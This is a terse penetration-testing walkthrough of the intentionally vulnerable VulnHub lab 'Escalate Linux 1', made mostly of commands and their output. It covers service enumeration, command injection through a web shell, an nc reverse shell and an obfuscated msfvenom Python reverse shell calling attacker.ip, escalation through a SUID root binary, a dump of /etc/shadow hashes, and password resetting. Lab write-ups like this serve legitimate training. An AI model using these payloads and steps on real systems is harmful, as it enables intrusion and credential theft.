Vulnerable Test Machine ----------------------- Escalate Linux 1: https://www.vulnhub.com/entry/escalate_linux-1,323/ kali$ ifconfig kali$ netdiscover kali$ nmap -sC -sV -A target.ip -o escalateLinux Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-29 12:43 EDT Nmap scan report for target.ip Host is up (0.0014s latency). Not shown: 994 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f2:23:ad:4e:91:4a:4e:0b:68:58:bb:c4:1b:a1:cd:2a (RSA) | 256 14:25:d6:0f:cb:51:51:bd:27:c6:db:9f:f0:c0:65:7c (ECDSA) |_ 256 17:71:af:fb:5c:e2:7c:ea:ef:ef:75:d7:de:ba:b3:63 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 3 2049/udp nfs | 100003 3 2049/udp6 nfs | 100003 3,4 2049/tcp nfs | 100003 3,4 2049/tcp6 nfs | 100005 1,2,3 35711/tcp mountd | 100005 1,2,3 37628/udp6 mountd | 100005 1,2,3 39404/udp mountd | 100005 1,2,3 51303/tcp6 mountd | 100021 1,3,4 35421/tcp6 nlockmgr | 100021 1,3,4 38613/tcp nlockmgr | 100021 1,3,4 52981/udp nlockmgr | 100021 1,3,4 57060/udp6 nlockmgr | 100227 3 2049/tcp nfs_acl | 100227 3 2049/tcp6 nfs_acl | 100227 3 2049/udp nfs_acl |_ 100227 3 2049/udp6 nfs_acl 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) 2049/tcp open nfs 3-4 (RPC #100003) MAC Address: 08:00:27:36:AA:E6 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Host: LINUX; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb2-time: | date: 2025-03-29T16:43:34 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_nbstat: NetBIOS name: LINUX, NetBIOS user: , NetBIOS MAC: (unknown) | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: osboxes | NetBIOS computer name: LINUX\x00 | Domain name: \x00 | FQDN: osboxes |_ System time: 2025-03-29T12:43:34-04:00 TRACEROUTE HOP RTT ADDRESS 1 1.36 ms target.ip OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.43 seconds kali$ smbclient -L target.ip Sharename Type Comment --------- ---- ------- liteshare Disk IPC$ IPC IPC Service (Linux Lite Shares) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP LINUX kali$ smbclient //target.ip/liteshare Password for [WORKGROUP\root]: tree connect failed: NT_STATUS_ACCESS_DENIED kali$ dirb http://target.ip/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Mar 29 12:48:30 2025 URL_BASE: http://target.ip/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://target.ip/ ---- + http://target.ip/index.html (CODE:200|SIZE:10918) + http://target.ip/server-status (CODE:403|SIZE:301) ----------------- END_TIME: Sat Mar 29 12:48:42 2025 DOWNLOADED: 4612 - FOUND: 2 kali$ gobuster dir -u http://target.ip/ -w /usr/share/wordlists/dirbuster/dirbuster/directory-list-2.3-medium.txt -x php =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://target.ip/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.php (Status: 403) [Size: 292] /shell.php (Status: 200) [Size: 29] Progress: 12216 / 441122 (2.77%)^C [!] Keyboard interrupt detected, terminating. Progress: 12247 / 441122 (2.78%) =============================================================== Finished =============================================================== # Command Injection Discovered kali$ curl http://target.ip/shell.php /*pass cmd as get parameter*/ # Command Injection kali$ curl http://target.ip/shell.php?cmd=id uid=1005(user6) gid=1005(user6) groups=1005(user6) /*pass cmd as get parameter*/ # Set Server for Reverse Shell Connection kali$ nc -nvlp 444 listening on [any] 444 ... # URL encode the injection payload and send injection attack via curl # rm -f /tmp/backpipe && mkfifo /tmp/backpipe && cat /tmp/backpipe | /bin/bash -i 2>&1 | nc attacker.ip 4444 > /tmp/backpipe kali$ curl http://target.ip/shell.php?cmd=%72%6d%20%2d%66%20%2f%74%6d%70%2f%62%61%63%6b%70%69%70%65%20%26%26%20%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%62%61%63%6b%70%69%70%65%20%26%26%20%63%61%74%20%2f%74%6d%70%2f%62%61%63%6b%70%69%70%65%20%7c%20%2f%62%69%6e%2f%62%61%73%68%20%2d%69%20%32%3e%26%31%20%7c%20%6e%63%20%31%39%32%2e%31%36%38%2e%30%2e%32%32%34%20%34%34%34%20%3e%20%2f%74%6d%70%2f%62%61%63%6b%70%69%70%65 # Successful Connection kali$ nc -nvlp 4444 listening on [any] 4444 ... connect to [attacker.ip] from (UNKNOWN) [target.ip] 41130 bash: cannot set terminal process group (916): Inappropriate ioctl for device bash: no job control in this shell Welcome to Linux Lite 4.4 Saturday 29 March 2025, 13:28:32 Memory Usage: 355/985MB (36.04%) Disk Usage: 6/217GB (3%) Support - https://www.linuxliteos.com/forums/ (Right click, Open Link) user6 / | var | www | html ls ls index.html shell.php user6 / | var | www cd ~ cd ~ user6 / | home | user6 ls user6 / | home | user6 cd .. cd .. user6 / | home ls ls user1 user2 user3 user4 user5 user6 user7 user8 user6 / | home ls user6 / | home cd ../user1 user1 / | home | user1 ls user6 / | home | user1 cd ../user2 cd ../user2 user6 / | home | user2 ls user6 / | home | user2 cd ../user3 cd ../user3 user6 / | home | user3 ls ls Desktop Documents Downloads Music Pictures Public Templates Videos shell user6 / | home | user3 ls -la shell ls -la shell -rwsr-xr-x 1 root root 8392 Jun 4 2019 shell user6 / | home | user3 id id uid=1005(user6) gid=1005(user6) groups=1005(user6) user6 / | home | user3 ./shell ./shell You Can't Find Me bash: cannot set terminal process group (916): Inappropriate ioctl for device bash: no job control in this shell Welcome to Linux Lite 4.4 You are running in superuser mode, be very careful. Saturday 29 March 2025, 13:56:51 Memory Usage: 362/985MB (36.75%) Disk Usage: 6/217GB (3%) root / | home | user3 id id uid=0(root) gid=0(root) groups=0(root),1005(user6) root / | home | user3 cat /etc/shadow cat /etc/shadow root:$6$aAWw3Fpr$9XEJeR6fPN6zeRQpa7j0JYfKd4wMXMvJV85397U0gmVHLo/E0Nx.L9JFEJY5VwB/gGSJ1RDm3VP078nCnWoqh/:20174:0:99999:7::: daemon:x:17995:0:99999:7::: bin:x:17995:0:99999:7::: sys:x:17995:0:99999:7::: sync:x:17995:0:99999:7::: games:x:17995:0:99999:7::: man:x:17995:0:99999:7::: lp:x:17995:0:99999:7::: mail:x:17995:0:99999:7::: news:x:17995:0:99999:7::: uucp:x:17995:0:99999:7::: proxy:x:17995:0:99999:7::: www-data:x:17995:0:99999:7::: backup:x:17995:0:99999:7::: list:x:17995:0:99999:7::: irc:x:17995:0:99999:7::: gnats:x:17995:0:99999:7::: systemd-timesync:x:17995:0:99999:7::: systemd-network:x:17995:0:99999:7::: systemd-resolve:x:17995:0:99999:7::: syslog:x:17995:0:99999:7::: _apt:x:17995:0:99999:7::: messagebus:x:17995:0:99999:7::: uuidd:x:17995:0:99999:7::: lightdm:x:17995:0:99999:7::: ntp:x:17995:0:99999:7::: avahi:x:17995:0:99999:7::: colord:x:17995:0:99999:7::: dnsmasq:x:17995:0:99999:7::: hplip:x:17995:0:99999:7::: nm-openconnect:x:17995:0:99999:7::: nm-openvpn:x:17995:0:99999:7::: pulse:x:17995:0:99999:7::: rtkit:x:17995:0:99999:7::: saned:x:17995:0:99999:7::: usbmux:x:17995:0:99999:7::: geoclue:x:17995:0:99999:7::: nobody:x:17995:0:99999:7::: vboxadd:!:17995:::::: user1:$6$4jfq.pYc$sS94o7D4JGix/lapyHz7ZGR4u2KovQzD.gB3TagCTGjGYYLkpOg28fBvYF2z0LIksW9UuP9sK2zoZIla9MwHa/:20174:0:99999:7::: user2:$6$PgbhTsu.$wbvZnWk.Ac82noTxS0xuawnZc5X1E46yBfNvAKdbe99ZwSwk5OeI/iLbEE2KhVX6JKtrdml6.c2wBcpfacSHR/:20176:0:99999:7::: user3:$6$PaKeECW4$5yMn9UU4YByCj0LP4QWaGt/S1aG0Zs73EOJXh.Rl0ebjpmsBmuGUwTgBamqCCx7qZ0sWJOuzIqn.GM69aaWJO0:18051:0:99999:7::: user4:$6$0pxj6KPl$NA5S/2yN3TTJbPypEnsqYe1PrgbfccHntMggLdU2eM5/23dnosIpmD8sRJwI1PyDFgQXH52kYk.bzc6sAVSWm.:18051:0:99999:7::: statd:*:18051:0:99999:7::: user5:$6$wndyaxl9$cOEaymjMiRiljzzaSaFVXD7LFx2OwOxeonEdCW.GszLm77k0d5GpQZzJpcwvufmRndcYatr5ZQESdqbIsOb9n/:18051:0:99999:7::: user6:$6$Y9wYnrUW$ihpBL4g3GswEay/AqgrKzv1n8uKhWiBNlhdKm6DdX7WtDZcUbh/5w/tQELa3LtiyTFwsLsWXubsSCfzRcao1u/:18051:0:99999:7::: mysql:$6$O2ymBAYF$NZDtY392guzYrveKnoISea6oQpv87OpEjEef5KkEUqvtOAjZ2i1UPbkrfmrHG/IonKdnYEec0S0ZBcQFZ.sno/:18053:0:99999:7::: user7:$6$5RBuOGFi$eJrQ4/xf2z/3pG43UkkoE35Jb0BIl7AW/umj1Xa7eykmalVKiRKJ4w3vFEOEOtYinnkIRa.89dXtGQXdH.Rdy0:18052:0:99999:7::: user8:$6$fdtulQ7i$G9THW4j6kUy4bXlf7C/0XQtntw123LRVRfIkJ6akDLPHIqB5PJLD4AEyz7wXsEhMc2XC4CqiTxATfb20xWaXP.:18052:0:99999:7::: sshd:*:20174:0:99999:7::: root / | home | user3 sudo echo "user1:userp" | chpasswd sudo echo "user1:userp" | chpasswd root / | home | user3 echo "user1:user1" | sudo chpasswd echo "user1:user1" | sudo chpasswd -- OR -- # Set Server for Reverse Shell Connection kali$ nc -nvlp 4444 listening on [any] 4444 ... # Create reverse shell payload kali$ msfvenom -p cmd/unix/reverse_python lhost=attacker.ip lport=4444 raw [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload [-] No arch selected, selecting arch: cmd from the payload No encoder specified, outputting raw payload Payload size: 364 bytes python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqVkd8LgjAQx/8V2dMGceoYUcQeJAwiKkjfJddCybbh6f8fMiOYT93LcT8+3/vCtW9n+yFCq156iHys5oxj7XqrNGIwsHNjF32jsThIkm45pOsNJMC5IOHOdEgKIcI+Sn8dfKJzlR2q4yUvQ09+WFz3p6oob3l2Zgs9UNYYrQZKJ1uBwOSCLRiL8BgdpwjPttPGUhZgyf9I+j/CF4iTvy+AuncdJXHdmhgbwj51Q2Yx')[0])))" # URL encode the injection payload and send injection attack via curl %70%79%74%68%6f%6e%20%2d%63%20%22%65%78%65%63%28%5f%5f%69%6d%70%6f%72%74%5f%5f%28%27%7a%6c%69%62%27%29%2e%64%65%63%6f%6d%70%72%65%73%73%28%5f%5f%69%6d%70%6f%72%74%5f%5f%28%27%62%61%73%65%36%34%27%29%2e%62%36%34%64%65%63%6f%64%65%28%5f%5f%69%6d%70%6f%72%74%5f%5f%28%27%63%6f%64%65%63%73%27%29%2e%67%65%74%65%6e%63%6f%64%65%72%28%27%75%74%66%2d%38%27%29%28%27%65%4e%71%56%6b%64%38%4c%67%6a%41%51%78%2f%38%56%32%64%4d%47%63%65%6f%59%55%63%51%65%4a%41%77%69%4b%6b%6a%66%4a%64%64%43%79%62%62%68%36%66%38%66%4d%69%4f%59%54%39%33%4c%63%54%38%2b%33%2f%76%43%74%57%39%6e%2b%79%46%43%71%31%35%36%69%48%79%73%35%6f%78%6a%37%58%71%72%4e%47%49%77%73%48%4e%6a%46%33%32%6a%73%54%68%49%6b%6d%34%35%70%4f%73%4e%4a%4d%43%35%49%4f%48%4f%64%45%67%4b%49%63%49%2b%53%6e%38%64%66%4b%4a%7a%6c%52%32%71%34%79%55%76%51%30%39%2b%57%46%7a%33%70%36%6f%6f%62%33%6c%32%5a%67%73%39%55%4e%59%59%72%51%5a%4b%4a%31%75%42%77%4f%53%43%4c%52%69%4c%38%42%67%64%70%77%6a%50%74%74%50%47%55%68%5a%67%79%66%39%49%2b%6a%2f%43%46%34%69%54%76%79%2b%41%75%6e%63%64%4a%58%48%64%6d%68%67%62%77%6a%35%31%51%32%59%78%27%29%5b%30%5d%29%29%29%22%0a kali$ curl http://target.ip/shell.php?cmd=%70%79%74%68%6f%6e%20%2d%63%20%22%65%78%65%63%28%5f%5f%69%6d%70%6f%72%74%5f%5f%28%27%7a%6c%69%62%27%29%2e%64%65%63%6f%6d%70%72%65%73%73%28%5f%5f%69%6d%70%6f%72%74%5f%5f%28%27%62%61%73%65%36%34%27%29%2e%62%36%34%64%65%63%6f%64%65%28%5f%5f%69%6d%70%6f%72%74%5f%5f%28%27%63%6f%64%65%63%73%27%29%2e%67%65%74%65%6e%63%6f%64%65%72%28%27%75%74%66%2d%38%27%29%28%27%65%4e%71%56%6b%64%38%4c%67%6a%41%51%78%2f%38%56%32%64%4d%47%63%65%6f%59%55%63%51%65%4a%41%77%69%4b%6b%6a%66%4a%64%64%43%79%62%62%68%36%66%38%66%4d%69%4f%59%54%39%33%4c%63%54%38%2b%33%2f%76%43%74%57%39%6e%2b%79%46%43%71%31%35%36%69%48%79%73%35%6f%78%6a%37%58%71%72%4e%47%49%77%73%48%4e%6a%46%33%32%6a%73%54%68%49%6b%6d%34%35%70%4f%73%4e%4a%4d%43%35%49%4f%48%4f%64%45%67%4b%49%63%49%2b%53%6e%38%64%66%4b%4a%7a%6c%52%32%71%34%79%55%76%51%30%39%2b%57%46%7a%33%70%36%6f%6f%62%33%6c%32%5a%67%73%39%55%4e%59%59%72%51%5a%4b%4a%31%75%42%77%4f%53%43%4c%52%69%4c%38%42%67%64%70%77%6a%50%74%74%50%47%55%68%5a%67%79%66%39%49%2b%6a%2f%43%46%34%69%54%76%79%2b%41%75%6e%63%64%4a%58%48%64%6d%68%67%62%77%6a%35%31%51%32%59%78%27%29%5b%30%5d%29%29%29%22%0a kali$ nc -nvlp 4444 listening on [any] 4444 ... connect to [attacker.ip] from (UNKNOWN) [target.ip] 41134 ls index.html shell.php bash -i bash: cannot set terminal process group (916): Inappropriate ioctl for device bash: no job control in this shell Welcome to Linux Lite 4.4 Saturday 29 March 2025, 13:50:22 Memory Usage: 360/985MB (36.55%) Disk Usage: 6/217GB (3%) Support - https://www.linuxliteos.com/forums/ (Right click, Open Link) user6 / | var | www | html # Add a check for non-interactive sessions: Before any output-generating commands (like echo or date), add the following check to ensure they are only executed in interactive shells: kali$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa user1@target.ip export TERM=xterm nano ~/.bashrc kali$ nano /home/user1/.bashrc if [[ -z "$PS1" ]]; then return fi